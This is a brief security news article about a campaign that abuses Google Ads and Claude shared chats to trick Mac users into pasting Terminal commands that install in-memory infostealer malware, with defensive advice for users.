Hackers Abuse Google Ads and Claude Shared Chats to Spread macOS Malware

Attackers are abusing legitimate Anthropic Claude shared chats and Google Ads to trick Mac users into installing malware through fake setup guides.

The campaign targets people searching for “Claude mac download.” Sponsored results appear to show real claude.ai links, but they lead victims to shared Claude chats that pose as installation instructions.

Real Claude pages make the attack harder to spot

The dangerous part is that attackers are not relying on fake Claude domains. Instead, they use Claude’s own shared chat feature to host malicious instructions that look like legitimate setup guides.

Some pages claim to explain how to install “Claude Code on Mac,” while others appear to borrow trust signals from names like Apple Support. Once users open the guide, they are told to launch Terminal and paste commands.

Those commands quietly download and run malware, often without leaving obvious files behind.

Malware runs in memory and steals Mac data

Researchers found that the payloads use compressed shell scripts and execute mainly in memory. This helps the malware avoid basic detection because users may not see a suspicious app or installer on disk.

The malware can collect the victim’s IP address, hostname, locale, and keyboard settings. Some variants also appear to avoid Russian and CIS-region systems.

Once active, the malware can run commands through osascript, steal browser passwords, grab cookies, access macOS Keychain data, and send stolen information to attacker-controlled servers. One variant has been linked to the MacSync infostealer.

Sponsored software downloads remain risky

The campaign shows why users should avoid sponsored results when downloading apps, especially developer tools or AI clients. A real domain in a Google ad does not always mean the instructions are safe.

Users should download Claude only through official Anthropic pages and documentation. Mac users should also avoid pasting Terminal commands from shared chats, search ads, forums, or unknown setup guides.

This is not the first time attackers have used trusted AI platforms or search ads to spread malware. Hackers previously abused Bing AI to distribute malicious links, and fake Claude AI downloads were also used in recent malware campaigns. A fake OpenAI Privacy Filter repository on Hugging Face also recently reached the top trending spot before researchers exposed it as an infostealer campaign.

Via Bleeping Computer